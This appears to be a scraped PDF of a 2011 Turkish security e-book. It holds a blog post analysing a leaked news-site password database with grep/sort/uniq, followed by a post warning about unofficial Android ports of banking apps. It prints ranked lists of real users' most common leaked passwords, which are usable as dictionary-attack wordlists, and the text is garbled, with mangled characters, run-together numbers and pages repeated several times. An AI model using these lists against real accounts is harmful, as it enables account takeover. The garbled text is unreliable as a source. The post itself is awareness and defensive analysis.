Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 44: Hack 4 Career - 2011

44

Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 45: Hack 4 Career - 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

